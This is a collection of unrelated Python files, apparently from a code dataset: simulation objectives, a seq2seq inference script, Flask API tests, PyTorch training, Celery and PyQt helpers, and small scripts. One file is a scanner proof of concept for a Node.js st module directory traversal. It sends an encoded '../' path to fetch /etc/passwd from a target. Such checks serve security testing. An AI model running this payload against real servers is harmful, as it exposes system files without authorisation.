radpat_objval_vec = np.append(radpat_objval_vec, rotsym_objval_vec.mean())
if self.cxlevel_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, cxlevel_objval_vec.mean())
if self.taperang_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, taperang_objval_vec.mean())
if self.sll_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, sll_objval_vec.mean())
if self.ar_ff_mae_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_mae_objval_vec.mean())
if self.ar_ff_max_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_max_objval_vec.mean())
return radpat_objval_vec
def func_cst_data_analyse(self, singlerun_export_folder, run_id, ff_export_sub_folder):
# Evaluate S parameters
spara_objval_vec = self.func_cst_data_spara_analyse(singlerun_export_folder)
# Evaluate farfield
radpat_objval_vec = self.func_cst_data_farfield_analyse(singlerun_export_folder, ff_export_sub_folder)
# Evaluate near-field AR
nf_ar_objval_vec = np.array([])
nf_ar_file_name = self.nf_ar_file_name
nf_ar_goal_val = self.nf_ar_goal
nf_ar_mae_weight = self.nf_ar_mae_weight
nf_ar_maxnorm_weight = self.nf_ar_maxnorm_weight
nf_ar_eva_freq_range_vec = self.nf_ar_eva_freq_range_vec
if nf_ar_mae_weight != 0:
nf_ar_objval_mae = self.func_nf_ar_objval_calc_maetrunc(singlerun_export_folder, nf_ar_file_name,
nf_ar_goal_val, nf_ar_eva_freq_range_vec,
nf_ar_mae_weight)
# Form NF AR objective value list
nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_mae)
if nf_ar_maxnorm_weight != 0:
nf_ar_objval_max = self.func_nf_ar_objval_calc_maxnormtrunc(singlerun_export_folder, nf_ar_file_name,
nf_ar_goal_val, nf_ar_eva_freq_range_vec,
nf_ar_maxnorm_weight)
# Form near-field AR objective value list
nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_max)
# Combine all objective values
objval_vec = np.concatenate((spara_objval_vec, radpat_objval_vec, nf_ar_objval_vec))
objval_total = objval_vec.sum()
# print objective values
objval_vec_str = np.array2string(objval_vec, precision=7, separator=',', suppress_small=True)
pring_msg = "Sim[%d]: ObjValVec = %s; ObjVal = %f;" % (run_id, objval_vec_str, objval_total)
print(pring_msg)
return objval_total, objval_vec
|
nilq/baby-python
|
python
|
# -*- coding:utf-8 -*-
"""
@description:
"""
import os
import sys
import numpy as np
import torch
from jiwer import wer
import sacrebleu
sys.path.append('..')
import config
from data_reader import load_word_dict
from seq2seq_model import Seq2SeqModel
from utils.logger import logger
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Inference(object):
def __init__(self, arch, model_dir, embed_size=50, hidden_size=50, dropout=0.5, max_length=128,
batch_size=8, epochs=10, evaluate_during_training=True, eval_batch_size=64, evaluate_during_training_steps=2500):
logger.debug("device: {}".format(device))
if arch == "bert":
# Bert Seq2seq model
logger.debug('use bert seq2seq model.')
use_cuda = True if torch.cuda.is_available() else False
model_args = {
"reprocess_input_data": True,
"overwrite_output_dir": True,
"max_seq_length": max_length if max_length else 128,
"train_batch_size": batch_size if batch_size else 8,
"num_train_epochs": epochs if epochs else 10,
"save_eval_checkpoints": False,
"save_model_every_epoch": False,
"silent": False,
"evaluate_generated_text": True,
"evaluate_during_training": evaluate_during_training,
"evaluate_during_training_verbose": evaluate_during_training,
"eval_batch_size": eval_batch_size if eval_batch_size else 64,
"evaluate_during_training_steps": evaluate_during_training_steps if evaluate_during_training_steps else 2500,
"use_multiprocessing": False,
"save_best_model": True,
"max_length": max_length if max_length else 128, # The maximum length of the sequence
"output_dir": model_dir if model_dir else "output/bertseq2seq_demo/",
}
# encoder_type=None, encoder_name=None, decoder_name=None
self.model = Seq2SeqModel(arch, "{}/encoder".format(model_dir),
"{}/decoder".format(model_dir), args=model_args, use_cuda=use_cuda)
else:
logger.error('error arch: {}'.format(arch))
raise ValueError("Model arch choose error. Must use one of seq2seq model.")
self.arch = arch
self.max_length = max_length
def predict(self, sentence_list):
result = []
if self.arch == "bert":
corrected_sents = self.model.predict(sentence_list)
result = [i.replace(' ', '') for i in corrected_sents]
else:
raise ValueError('error arch.')
return result
if __name__ == "__main__":
m = Inference(config.arch,
config.model_dir,
embed_size=config.embed_size,
hidden_size=config.hidden_size,
dropout=config.dropout,
max_length=config.max_length,
batch_size=config.batch_size,
epochs=config.epochs,
evaluate_during_training=config.evaluate_during_training,
eval_batch_size=config.eval_batch_size,
evaluate_during_training_steps=config.evaluate_during_training_steps
)
print('开始预测,以Tab键中止')
while True:
inputs = input('输入文本:')
if inputs == '\t':
break
outputs = m.predict([inputs])
print('纠错结果为:'+outputs[0])
|
nilq/baby-python
|
python
|
# Copyright 2016, 2017 John J. Rofrano. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Products API Service Test Suite
Test cases can be run with the following:
nosetests -v --with-spec --spec-color
coverage report -m
codecov --token=$CODECOV_TOKEN
"""
import unittest
import os
import logging
import mock
from flask_api import status # HTTP Status Codes
import app.service as service
import app.vcap_services as vcap
#from mock import MagicMock, patch
from app.models import Products, DataValidationError, db
from .product_factory import ProductFactory
DATABASE_URI = os.getenv('DATABASE_URI', 'sqlite:///../db/test.db')
######################################################################
# T E S T C A S E S
######################################################################
class TestProductsServer(unittest.TestCase):
""" Product Server Tests """
@classmethod
def setUpClass(cls):
""" Run once before all tests """
service.app.debug = False
service.initialize_logging(logging.INFO)
# Set up the test database
service.app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
""" Runs before each test """
service.init_db()
db.drop_all() # clean up the last tests
db.create_all() # create new tables
self.app = service.app.test_client()
def tearDown(self):
db.session.remove()
db.drop_all()
def _create_products(self, count):
""" Factory method to create products in bulk """
products = []
for _ in range(count):
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED, 'Could not create test product')
new_product = resp.get_json()
test_product.id = new_product['id']
products.append(test_product)
return products
def test_index(self):
""" Test the Home Page """
resp = self.app.get('/')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
# data = resp.get_json()
# self.assertEqual(data['name'], 'Product Demo REST API Service')
def test_get_product_list(self):
""" Get a list of Products """
self._create_products(5)
resp = self.app.get('/products')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(len(data), 5)
def test_get_product(self):
""" Get a single Product """
# get the id of a product
test_product = self._create_products(1)[0]
resp = self.app.get('/products/{}'.format(test_product.id),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data['name'], test_product.name)
def test_get_product_not_found(self):
""" Get a Product thats not found """
resp = self.app.get('/products/0')
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_create_product(self):
""" Create a new Product """
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# Make sure location header is set
location = resp.headers.get('Location', None)
self.assertTrue(location != None)
# Check the data is correct
new_product = resp.get_json()
self.assertEqual(new_product['name'], test_product.name, "Names do not match")
self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
self.assertEqual(new_product['available'], test_product.available, "Availability does not match")
# Check that the location header was correct
resp = self.app.get(location,
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
new_product = resp.get_json()
self.assertEqual(new_product['name'], test_product.name, "Names do not match")
self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
self.assertEqual(new_product['available'], test_product.available, "Availability does not match")
def test_update_product(self):
""" Update an existing product """
# create a product to update
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# update the product
new_product = resp.get_json()
new_product['category'] = 'unknown'
resp = self.app.put('/products/{}'.format(new_product['id']),
json=new_product,
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
updated_product = resp.get_json()
self.assertEqual(updated_product['category'], 'unknown')
def test_unavailable_products(self):
""" Update an existing product to unavailable """
# create a product to update
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# update the product
new_product = resp.get_json()
new_product['available'] = True
resp = self.app.put('/products/{}/unavailable'.format(new_product['id']),
json=new_product,
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
updated_product = resp.get_json()
self.assertEqual(updated_product['available'], False)
def test_update_product_not_found(self):
""" Update a product that is not found """
test_product = ProductFactory()
resp = self.app.put('/products/0',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_product(self):
""" Delete a Product """
test_product = self._create_products(1)[0]
resp = self.app.delete('/products/{}'.format(test_product.id),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(len(resp.data), 0)
# make sure they are deleted
resp = self.app.get('/products/{}'.format(test_product.id),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_all(self):
""" Delete DB """
self._create_products(5)
resp = self.app.get('/products')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.app.delete('/products/reset',
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
def test_query_product_list_by_category(self):
""" Query Proucts by Category """
products = self._create_products(10)
test_category = products[0].category
category_products = [product for product in products if product.category == test_category]
resp = self.app.get('/products',
query_string='category={}'.format(test_category))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(len(data), len(category_products))
# check the data just to be sure
for product in data:
self.assertEqual(product['category'], test_category)
def test_method_not_allowed(self):
""" Test a sending invalid http method """
resp = self.app.post('/products/1')
self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
'''
Commenting our the URI because it works with Travis but
Will not work on the IBM Environment
'''
# def test_database_uri(self):
# """Test database URI is available"""
# self.assertEqual(vcap.get_database_uri(), 'postgres://postgres:postgres@localhost:5432/postgres')
@mock.patch('app.service.Products.find_by_name')
def test_search_bad_data(self, products_find_mock):
""" Test a search that returns bad data """
products_find_mock.return_value = None
resp = self.app.get('/products', query_string='name=widget1')
self.assertEqual(resp.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
@mock.patch('app.service.Products.find_by_name')
def test_mediatype_not_supported(self, media_mock):
""" Handles unsuppoted media requests with 415_UNSUPPORTED_MEDIA_TYPE """
media_mock.side_effect = DataValidationError()
resp = self.app.post('/products', query_string='name=widget1', content_type='application/pdf')
self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
@mock.patch('app.service.Products.find_by_name')
def test_method_not_supported(self, method_mock):
""" Handles unsuppoted HTTP methods with 405_METHOD_NOT_SUPPORTED """
method_mock.side_effect = None
resp = self.app.put('/products', query_string='name=widget1')
self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
@mock.patch('app.service.Products.find_by_name')
def test_bad_request(self, bad_request_mock):
""" Test a Bad Request error from Find By Name """
bad_request_mock.side_effect = DataValidationError()
resp = self.app.get('/products', query_string='name=widget1')
self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
# @patch('app.service.product.find_by_name')
# def test_bad_request(self, bad_request_mock):
# """ Test a Bad Request error from Find By Name """
# bad_request_mock.side_effect = DataValidationError()
# resp = self.app.get('/products', query_string='name=fido')
# self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
#
# @patch('app.service.product.find_by_name')
# def test_mock_search_data(self, product_find_mock):
# """ Test showing how to mock data """
# product_find_mock.return_value = [MagicMock(serialize=lambda: {'name': 'fido'})]
# resp = self.app.get('/products', query_string='name=fido')
# self.assertEqual(resp.status_code, status.HTTP_200_OK)
######################################################################
# M A I N
######################################################################
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
"""Helper neural network training module."""
from collections import OrderedDict
from pathlib import Path
from time import time
import torch
from torch import nn
from torch.utils.tensorboard import SummaryWriter
from ..datasets import IMAGE_SHAPES, get_loader
from ..models import fit_to_dataset, get_model
from ..models.utils import propagate_bounds
from .utils import (AverageMeter, bounds_logits, compute_accuracy,
get_device_order, manual_seed)
__all__ = ['train_classifier', 'one_epoch']
def train_classifier(evaluate_only, dataset, model, pretrained, learning_rate,
momentum, weight_decay, epsilon, factor, temperature,
epochs, batch_size, jobs, checkpoint, resume, log_dir,
seed):
"""Train and/or evaluate a network."""
manual_seed(seed, benchmark_otherwise=True)
resume = Path(resume if resume else '')
checkpoint = Path(checkpoint if checkpoint else '')
get_lr = lambda epoch: learning_rate * (0.1**(epoch // 30))
# get available cuda devices ordered by total memory capacity
devices = get_device_order()
if devices:
print(f'=> using {len(devices)} GPU(s)')
device = torch.device(f'cuda:{devices[0]}')
else:
device = torch.device('cpu')
def to_device(*tensors, non_blocking=True):
return [t.to(device, non_blocking=non_blocking) for t in tensors]
# Data loading code
cuda = len(devices) > 0
train_loader = get_loader(dataset, True, batch_size, cuda, jobs)
val_loader = get_loader(dataset, False, batch_size, cuda, jobs)
norm = train_loader.dataset.transform.transforms[-1]
input_ranges = [(1 - m) / s + m / s for m, s in zip(norm.mean, norm.std)]
input_range = sum(input_ranges) / len(input_ranges)
# create the model
if pretrained:
print(f'=> using pre-trained model {model}')
else:
print(f'=> creating model {model}')
net = fit_to_dataset(get_model(model, pretrained), dataset).eval()
keys = net.state_dict(keep_vars=True).keys()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss()
to_device(net, criterion, non_blocking=False)
optimizer = torch.optim.SGD(
net.parameters(),
learning_rate,
momentum=momentum,
weight_decay=weight_decay)
# define a colsure wrapping one_epoch()
def process(loader, optimizer=None):
return one_epoch(loader, net, criterion, optimizer, to_device,
epsilon * input_range, factor, temperature)
# optionally resume from a checkpoint
best_acc1 = 0
start_epoch = 0
if resume.is_file():
print("=> loading checkpoint '{}'".format(resume))
state = torch.load(resume)
start_epoch = state['epoch']
best_acc1 = state['best_acc1']
net.load_state_dict(state['state_dict'])
optimizer.load_state_dict(state['optimizer'])
print(f"=> loaded checkpoint '{resume}' (epoch {state['epoch']})")
elif resume != Path():
print(f"=> no checkpoint found at '{resume}'")
# DataParallel will divide and allocate batch_size to all GPUs
if len(devices) > 1:
if model.startswith('alexnet') or model.startswith('vgg'):
net.features = nn.DataParallel(net.features, devices, device)
else:
net = nn.DataParallel(net, devices, device)
# evaluate the model before training
progress = process(val_loader)
val_loss = progress['Loss']
val_acc = progress['Acc@1']
print(f'Test[{val_loss}: {val_acc}%]')
if evaluate_only:
return
if log_dir:
writer = SummaryWriter(log_dir)
example_image = torch.randn(1, *IMAGE_SHAPES[dataset], device=device)
writer.add_graph(net, (example_image,))
lr = get_lr(start_epoch)
for epoch in range(start_epoch, epochs):
# decay the learning rate by 10 every 30 epochs
if epoch % 30 == 0:
lr = get_lr(epoch)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
# train for one epoch and evaluate on validation set
train_progress = process(train_loader, optimizer)
train_loss = train_progress['Loss']
train_acc = train_progress['Acc@1']
val_progress = process(val_loader)
val_loss = val_progress['Loss']
val_acc = val_progress['Acc@1']
print(f'[{epoch + 1}@{lr:.4e}] '
f'Train[{train_loss}: {train_acc}%] '
f'Test[{val_loss}: {val_acc}%]')
if log_dir:
writer.add_scalar('Train/LearingRate', lr, epoch)
for meter in train_progress.values():
writer.add_scalar(f'Train/{meter.name}', meter.avg, epoch)
for meter in val_progress.values():
writer.add_scalar(f'Test/{meter.name}', meter.avg, epoch)
# remember best acc@1 and save checkpoint
if val_acc.avg >= best_acc1:
best_acc1 = val_acc.avg
if checkpoint != Path():
parameters = net.state_dict().values()
torch.save({
'epoch': epoch + 1,
'state_dict': OrderedDict(zip(keys, parameters)),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
}, checkpoint)
if train_loss != train_loss:
print('Training was stopped (reached NaN)!')
break
if log_dir:
writer.close()
def one_epoch(train_loader, net, criterion, optimizer, preporcess, epsilon,
factor, temperature):
"""Perform one training epoch."""
batch_time = AverageMeter('Time/BatchTotal', ':6.3f')
data_time = AverageMeter('Time/BatchData', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
# switch to train mode
is_training = optimizer is not None
net.train(is_training)
def compute_loss(inputs, targets, update_metrics):
# compute output
output = net(inputs)
loss = criterion(output, targets)
# compute bounds loss
if epsilon > 0 and factor > 0:
bounds = propagate_bounds(net, inputs, epsilon)
logits = bounds_logits(output, bounds.offset, targets)
max_abs_logits = logits.abs().max(1).values.view(-1, 1)
logits = logits / (temperature * max_abs_logits)
loss += factor * criterion(logits, targets)
# measure accuracy and record loss
if update_metrics:
n = inputs.size(0)
acc1, acc5 = compute_accuracy( # pylint: disable=E0632
output, targets, top_k=(1, 5))
losses.update(float(loss), n)
top1.update(float(acc1), n)
top5.update(float(acc5), n)
# compute gradient
if is_training:
optimizer.zero_grad()
loss.backward()
return loss
with torch.set_grad_enabled(is_training):
end = time()
for inputs, targets in train_loader:
# measure data loading time
data_time.update(time() - end)
# move data to device
inputs, targets = preporcess(inputs, targets)
first_time = True
def closure():
nonlocal first_time
loss = compute_loss(
inputs, # pylint: disable=W0640
targets, # pylint: disable=W0640
first_time,
)
first_time = False
return loss
if is_training:
optimizer.step(closure)
else:
closure()
# measure elapsed time
batch_time.update(time() - end)
end = time()
return {x.name: x for x in (batch_time, data_time, losses, top1, top5)}
|
nilq/baby-python
|
python
|
from PyQt5 import QtWidgets
from otter.OListView import OListView
class TemplatesTab(QtWidgets.QWidget):
"""
List of recent file that show on the MainWindow
"""
def __init__(self, parent):
super().__init__(parent)
main_layout = QtWidgets.QVBoxLayout()
main_layout.setContentsMargins(10, 10, 10, 0)
self.template_list = OListView(self)
self.template_list.setEmptyMessage("No templates")
self.template_list.setSelectionMode(
QtWidgets.QAbstractItemView.SingleSelection)
main_layout.addWidget(self.template_list)
button_layout = QtWidgets.QHBoxLayout()
button_layout.setContentsMargins(0, 0, 0, 0)
self.new_button = QtWidgets.QPushButton("New", self)
self.new_button.setContentsMargins(0, 0, 10, 0)
button_layout.addWidget(self.new_button)
button_layout.addStretch()
self.open_button = QtWidgets.QPushButton("Open", self)
button_layout.addWidget(self.open_button)
main_layout.addLayout(button_layout)
self.setLayout(main_layout)
self.new_button.clicked.connect(self.onNew)
self.open_button.clicked.connect(self.onOpen)
self.updateWidgets()
def updateWidgets(self):
"""
Update controls
"""
if len(self.template_list.selectedIndexes()) == 1:
self.open_button.setEnabled()
else:
self.open_button.setEnabled(False)
def onNew(self):
"""
Called when clicked on 'New' button
"""
def onOpen(self):
"""
Called when clicked on 'Open' button
"""
|
nilq/baby-python
|
python
|
import string
def alphabetSubsequence(s):
seen = -1
for i in s:
index = string.ascii_lowercase.find(i)
if index > seen:
seen = index
else:
return False
return True
s = "effg"
print(alphabetSubsequence(s))
|
nilq/baby-python
|
python
|
import os
import sys
import inspect
import string
import numpy as np
PycQED_py3_dir = "D:\\Github\\PycQED_py3"
AssemblerDir = PycQED_py3_dir + \
"\\instrument_drivers\\physical_instruments\\_controlbox"
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.append(AssemblerDir)
import Assembler
import old_assembler
qasm_ext = ".txt"
print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))
if len(sys.argv) != 2:
print("Error: Asm2Mem only receives one arguments as the assembly file.")
exit(0)
rawinput = sys.argv[1]
print("The file read from the argument is:", rawinput)
asm_name = rawinput
if not os.path.isfile(asm_name):
print("\tError! The file does not exist")
if (asm_name[-len(qasm_ext):] != qasm_ext):
print("\t Error! The input asm file should have the", qasm_ext,
"extension. ")
exit(0)
asm1 = Assembler.Assembler(asm_name)
instructions1 = asm1.convert_to_instructions()
asm2 = old_assembler.Assembler(asm_name)
instructions2 = asm2.convert_to_instructions()
print("compare Result: ", np.array_equal(instructions1, instructions2))
assert(len(instructions1) == len(instructions2))
print("instructions1", '\t', "instructions2")
for i in range(len(instructions1)):
print(instructions1[i], '\t', instructions2[i])
|
nilq/baby-python
|
python
|
val = input().split()
a, b, c = val
a = float(a)
b = float(b)
c = float(c)
if a < (a+b) and b < (c+a) and c < (a+b):
per = a + b + c
print('Area = %.2f' %per)
|
nilq/baby-python
|
python
|
import pandas
import numpy
import filepaths
import utils
def fetch_ng_inflation_cpi():
stats_metadata = utils.read_stats_metadata()
url = stats_metadata['NG']['inflation']['CPI']['url']
tmp_filepath = utils.download_file(url)
df = pandas.read_excel(tmp_filepath, sheet_name='Table1', header=None)
df = df[17:331]
output_df = pandas.DataFrame({'year': df.iloc[:, 0], 'month': df.iloc[:, 1], 'observation': df.iloc[:, 5]})
# there must be a simpler way to do this, anyway, it replaces empty years with their correct value
clean_years = []
last_year = 0
for i in output_df.year.to_list():
if type(i) == int:
clean_years.append(i)
last_year = i
elif i is numpy.NaN:
clean_years.append(last_year)
output_df.year = clean_years
# some months are 3-letter, others are full name – replace with number value
month_map = {
'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12',
'January': '01', 'February': '02', 'March': '03', 'April': '04', 'May': '05', 'June': '06', 'July': '07', 'August': '08', 'September': '09', 'October': '10', 'November': '11', 'December': '12',
}
output_df.month = output_df.month.map(month_map)
output_df["month"] = output_df["year"].astype(str) + '-' + output_df["month"]
output_df.drop('year', axis=1, inplace=True)
output_filepath = filepaths.DATA_DIR / stats_metadata['NG']['inflation']['CPI']['filename']
output_df.to_csv(output_filepath, index=False)
if __name__ == '__main__':
fetch_ng_inflation_cpi()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import datetime
UNIQUE_REDIS_KEY_PREFIX = 'celery_unique'
class UniqueTaskMixin(object):
abstract = True
unique_key = None
redis_client = None
def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, **options):
"""Apply tasks asynchronously by sending a message.
This method serves either as a wrapper for `celery.Task.apply_async()` or, if the task decorator
was configured with a `redis_client`, callable `unique_key` and `apply_async()` was called with
either an `eta` or `countdown` argument, the task will be treated as unique. In these cases,
this method will first revoke any extant task which matches the same unique key configuration
before proceeding to publish the task. Before returning, a unique task's identifying unique key
will be saved to Redis as a key, with its task id (provided by the newly-created `AsyncResult` instance)
serving as the value.
@see `celery.Task.apply_async()`
"""
should_handle_as_unique_task = (
callable(self.unique_key)
and ('eta' in options.keys() or 'countdown' in options.keys())
and self.redis_client is not None
)
if should_handle_as_unique_task:
# Generate the unique redis key and revoke any task that shares the same key (if one exists)
unique_redis_key = self._make_redis_key(args, kwargs)
self._revoke_extant_unique_task_if_exists(unique_redis_key)
# Pass the task along to Celery for publishing and intercept the AsyncResult return value
rv = super(UniqueTaskMixin, self).apply_async(args, kwargs, task_id, producer, link, link_error, **options)
if should_handle_as_unique_task:
# Create a Redis key/value pair to serve as a tracking record for the newly-created task.
# The new record will be given a TTL that allows it to expire (approximately) at the same time
# that the task is executed.
ttl = self._make_ttl_for_unique_task_record(options)
self._create_unique_task_record(unique_redis_key, rv.task_id, ttl)
return rv
def _make_redis_key(self, callback_args, callback_kwargs):
"""Creates a key used to identify the task's unique configuration in Redis.
@note All positional arguments and/or keyword arguments sent to the task are applied identically to
the task's bound `unique_key` callable.
@param callback_args: The positional arguments which will be passed to the task when it executes
@type callback_args: list | tuple
@param callback_kwargs: The keyword arguments which will be passed to the task when it executes
@type callback_kwargs: dict
@return: The key which will be used to find any extant version of this task which, if found,
will by revoked. Keys are built by using three colon-delimited components:
1. A global prefix used to identify that the key/value pair in Redis was created to track
a unique Celery task (by default, this is "celery_unique")
2. The name of the task (usually the Python dot-notation path to the function)
3. The value produced by the `key_generator` callable when supplied with the task's callback
arguments.
@rtype: unicode
"""
# Get the unbound lambda used to create `self.unique_key` if the inner function exists
key_generator = self.unique_key.__func__ if hasattr(self.unique_key, '__func__') else self.unique_key
# Create and return the redis key with the generated unique key suffix
return '{prefix}:{task_name}:{unique_key}'.format(
prefix=UNIQUE_REDIS_KEY_PREFIX,
task_name=self.name,
unique_key=key_generator(
*(callback_args or ()),
**(callback_kwargs or {})
)
)
def _revoke_extant_unique_task_if_exists(self, redis_key):
"""Given a Redis key, deletes the corresponding record if one exists.
@param redis_key: The string (potentially) used by Redis as the key for the record
@type redis_key: str | unicode
"""
task_id = self.redis_client.get(redis_key)
if task_id is not None:
self.app.AsyncResult(task_id).revoke()
self.redis_client.delete(redis_key)
def _create_unique_task_record(self, redis_key, task_id, ttl):
"""Creates a new Redis key/value pair for the recently-published unique task.
@param redis_key: The unique key which identifies the task and its configuration (expected to be produced
by the `UniqueTaskMixin._make_redis_key()` method).
@type redis_key: str | unicode
@param task_id: The ID of the recently-published unique task, which will be used as the Redis value
@param ttl: The TTL for the Redis record, which should be (approximately) equal to the number of seconds
remaining until the earliest time that the task is expected to be executed by Celery.
"""
self.redis_client.set(redis_key, task_id, ex=ttl)
@staticmethod
def _make_ttl_for_unique_task_record(task_options):
"""Given the options provided to `apply_async()` as keyword arguments, determines the appropriate
TTL to ensure that a unique task record in Redis expires (approximately) at the same time as the earliest
time that the task is expected to be executed by Celery.
The TTL value will be determined by examining the following values, in order of preference:
- The `eta` keyword argument passed to `apply_async()`, if any. If this value is found,
then the TTL will be the number of seconds between now and the ETA datetime.
- The `countdown` keyword argument passed to `apply_async()`, which will theoretically always
exist if `eta` was not provided. If this value is used, the TTL will be equal.
Additionally, if an `expires` keyword argument was passed, and its value represents (either as an integer
or timedelta) a shorter duration of time than the values provided by `eta` or `countdown`, the TTL will be
reduced to the value of `countdown`.
Finally, the TTL value returned by this method will always be greater than or equal to 1, in order to ensure
compatibility with Redis' TTL requirements, and that a record produced for a nonexistent task will only
live for a maximum of 1 second.
@param task_options: The values passed as additional keyword arguments to `apply_async()`
@type task_options: dict
@return: The TTL (in seconds) for the Redis record to-be-created
@rtype: int
"""
# Set a default TTL as 1 second (in case actual TTL already occurred)
ttl_seconds = 1
option_keys = task_options.keys()
if 'eta' in option_keys:
# Get the difference between the ETA and now (relative to the ETA's timezone)
ttl_seconds = int(
(task_options['eta'] - datetime.datetime.now(tz=task_options['eta'].tzinfo)).total_seconds()
)
elif 'countdown' in option_keys:
ttl_seconds = task_options['countdown']
if 'expires' in option_keys:
if isinstance(task_options['expires'], datetime.datetime):
# Get the difference between the countdown and now (relative to the countdown's timezone)
seconds_until_expiry = int(
(task_options['expires'] - datetime.datetime.now(tz=task_options['expires'].tzinfo)).total_seconds()
)
else:
seconds_until_expiry = task_options['expires']
if seconds_until_expiry < ttl_seconds:
ttl_seconds = seconds_until_expiry
if ttl_seconds <= 0:
ttl_seconds = 1
return ttl_seconds
def unique_task_factory(task_cls):
"""Creates a new, abstract Celery Task class that enables properly-configured Celery tasks to uniquely exist.
@param task_cls: The original base class which should used with UniqueTaskMixin to produce a new Celery task
base class.
@type task_cls: type
@return: The new Celery task base class with unique task-handling functionality mixed in.
@rtype: type
"""
return type(str('UniqueTask'), (UniqueTaskMixin, task_cls), {})
|
nilq/baby-python
|
python
|
from . import hist, quality
|
nilq/baby-python
|
python
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Node.js st module Directory Traversal''',
"description": '''A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.''',
"severity": "high",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2014-3744",
"https://github.com/advisories/GHSA-69rr-wvh9-6c4q",
"https://snyk.io/vuln/npm:st:20140206"
],
"classification": {
"cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss-score": "7.5",
"cve-id": "CVE-2014-3744",
"cwe-id": "CWE-22"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2014", "lfi", "nodejs", "st"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "root:" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
nilq/baby-python
|
python
|
__copyright__ = "Copyright 2015 Contributing Entities"
__license__ = """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
